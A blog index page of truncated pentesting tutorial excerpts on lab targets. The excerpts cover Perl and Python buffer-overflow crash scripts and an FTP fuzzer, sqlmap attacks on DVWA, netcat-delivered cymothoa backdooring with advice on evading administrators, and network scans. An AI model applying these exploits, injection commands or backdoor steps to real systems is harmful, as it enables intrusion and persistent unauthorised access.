exploitation local exploit MP3 Converter

now i try again to buffer overflow RM MP3, in this step to check buffer i use 3 code to make buffer the first make 10000 string caracter, the second 20000 caracter, third 30000 caracter, i will try one by one to know how many caracter i need to make buffer RM MP3. in this job i use: OllyDBG Mini Stream RM MP3 Conveter exploit make it by my self file to buffer made by myself ok lets begin try to buffer, start to 10000 character no buffer :'(, second try 20000 character, yupp,, buffer, try again with 30000 character, yupp,, buffer again, boom boom buffer now i search on how many byte eip can buffer, i create string pattern 20000 character to known how byte need to go EIP and ESP. yupp got it boom crash again :D, now we will take EIP and ESP,...

Read more »

buffer overlow RM MP3

now i learn again buffer overflow, now i make buffer RM MP3, to make buffer i make file with perl script: my $file= "crash2.m3u"; my $junk= "\x41" x 30000; => this i change to know how many caracter to buffer open($FILE,">$file"); print $FILE "$junk"; close($FILE); print "m3u File Created successfully\n"; now i run this script to make file crash2.m3u then next step crash file will run on MP3 Converter when i run on aplication RM MP3 nothing crash, i've fail but no problem i try make file with other script i make him from script exploitdb: my $Header = "#EXTM3U\n"; my $ex="http://"."A" x 26121; open(MYFILE,'>>asu.m3u'); print MYFILE $Header.$ex; close(MYFILE); then i run this perl script and next i run file to RM MP3 and...

Read more »

download

http://www.mediafire.com/?w77a06erasgs...

Read more »

exploitation development > warftpd

this next step i learn about buffer overflow, in this step i try to exploit windows xp3 through buffer overflow vuln. in learn this method i need aplication WarFTPD, Metasploit, OllyDBG, to get vuln need fuzzer, i use fuzzer write by mrp.bpp he is my guru's: #!/usr/bin/python import socket s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) buffer="\x41"*1000 s.connect(('192.168.9.239',21)) > ip target data=s.recv(1024) print("sending evil data via USER command..") s.send('USER '+buffer+'\r\n') data=s.recv(1024) s.send('PASS PASSWORD '+'\r\n') s.close() print("Finish") this program has set to ip victim is 192.168.9.239, now i try run this.. no.. i've fail, my warftpd can't run when i run on ollydbg, i hope i can solve this probl...

Read more »

buffer overflow

Buffer overflow vulnerabilities have been around since the early days of computers and still exist today. Most Internet worms use buffer overflow vulnerabilities to propagate, and even the most recent zero-day VML vulnerability in Internet Explorer is due to a buffer overflow. C is a high-level programming language, but it assumes that the programmer is responsible for data integrity. If this responsibility were shifted over to the compiler, the resulting binaries would be significantly slower, due to integrity checks on every variable. Also, this would remove a significant level of control from the programmer and complicate the language. While C's simplicity increases the programmer's control and the efficiency of the resulting programs, it can also result in programs that are vulnerable...

Read more »

Dumping Database

if we attacking system through sqlvuln, we must know where vuln to be found, for that we need application wich checking vuln mysql. i use 2 aplication sqlmap, and burpsuite. lets begin to attack, in my article i use simulation use dvwa, this simulation i be user and search database and i will dump that. ok now lets begin, i run burpsuite and open dvwa website to mybrowser with port proxy 8080, i get "GET /dvwa/vulnerabilities/sqli/?id=%27or+1%3D1%23&Submit=Submit" and "Cookie: security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0". now i test it use sqlmap: root@cupenk:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=1v9l52d4gfr0morfhm1aib3fc0"     sqlmap/1.0-dev (r4009) - automatic...

Read more »

SQL Injection & Blind SQL Injection

A SQL injection attack consists of insertion or injection of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. This form of SQL injection occurs when user input is not filtered for escape characters and is then passed into an SQL statement. This results in the potential manipulation...

Read more »

backdooring with nc and cymothoa

on this article i try explain about backdooring with nc and cymothoa. this step do in hacking technique if we've done attack to system. install backodoor to victim should not be more 5 minute after done attacking. if more than you will fail, system administrator known what you do. u can install backdoor cymonthoa used nc, run command on vicitm system #nc -l -p 212 > cymothoa if done after that run nc too on your system for transfer cymonthoa root@cupenk:/pentest/backdoors/cymothoa# nc 192.168.0.135 212 < cymothoa if done change priv access cymonthoa on victim #chmod +rwx cymohoa ...

Read more »

privilage escallation webmin vuln

hacking on weekend, how we can getting the system?? to get it we must follow the rule of hacking.First step what should I do? Yea,, great information gathering for first step.root@cupenk:~# netdiscover Currently scanning: 192.168.48.0/16 | Screen View: Unique Hosts 91 Captured ARP Req/Rep packets, from 10 hosts. Total size: 5460 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.0.40 10:78:d2:36:65:a4 10 600 Unknown vendor 192.168.0.99 60:eb:69:06:22:ec...

Read more »

exploitation windows xp sp3 with SMB vuln

how exploitation windows xp sp3 use backtrack 5 R1? in my article i explore that. my windows xp sp3 installed on my virtualbox, after do everything i check communication my backtrack to windows. i try to ping os on virtualbox; Currently scanning: 192.168.83.0/16   |   Screen View: Unique Hosts                                                                                        5 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 300              _____________________________________________________________________________  ...

Read more »

scanning vulnerability windows xp sp3 & ubuntu 10.04 default configuration

in this time i try scanning vuln on windows xp sp3 and ubuntu 10.04, ubuntu and windows no configuration added, all default. i will try use nmap and nessus for scanning. ubuntu: Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-02-02 15:02 WIT NSE: Loaded 87 scripts for scanning. NSE: Script Pre-scanning. Initiating ARP Ping Scan at 15:02 Scanning 192.168.4.43 [1 port] Completed ARP Ping Scan at 15:02, 0.07s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:02 Completed Parallel DNS resolution of 1 host. at 15:02, 0.00s elapsed Initiating SYN Stealth Scan at 15:02 Scanning 192.168.4.43 [1000 ports] Completed SYN Stealth Scan at 15:02, 0.39s elapsed (1000 total ports) Initiating Service scan at 15:02 Initiating...

Read more »

Installing Nessus

in my article i will explore about installing nessus. nessus is a tools for developing vulnerability searching, you can get it on http://nessus.org/download/. in installation i use backtrack 5R1 Gnome, so that i take deb file. for installation you can be use command installation deb file " dpkg -i "filename" ". after done install nessus you must adding user for login on nessus tools. on terminal command input [“/opt/nessus/sbin/nessus-adduser”] fill username and password if your done make user you must register for getting pluggin, register can do on http://www.nessus.org/products/nessus/nessus-homefeed if done you check email for get registration code, if you've got it do terminal command [/opt/nessus/bin/nessus-fetch...

Read more »